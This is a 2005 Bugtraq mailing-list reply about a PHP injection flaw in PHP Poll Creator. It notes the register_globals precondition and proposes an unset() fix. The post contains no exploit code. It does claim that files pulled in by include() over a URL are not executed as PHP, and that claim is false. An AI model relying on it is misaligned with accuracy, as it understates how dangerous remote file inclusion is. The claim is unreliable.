Date: Thu, 26 May 2005 18:41:45 +1000
From: Michael Cordover <michael.cordover@...il.com>
To: bugtraq@...urityfocus.com
Cc: rash ilusion <torash@...il.com>
Subject: Re: PHP Injection in PHP Poll Creator

Hi,

It should be noted that this only occurs where register_globals is set
to on in php.ini or using php_flag in a .htaccess file which is
currently not the default value.  Thus the vulnrability is not major.

Despite this, it is poor coding practice.  Suggested fix is inserting,
before that line:

if (!empty($_REQUEST['relativer_pfad'])) {
  unset($relativer_pfad);
}

It should furthermore be noted that URL wrapped files which are
included using include() are NOT parsed using PHP, rather their output
is passed as raw HTML.  This can still present an XSS-like attack,
however.

Regards,

Michael Cordover

--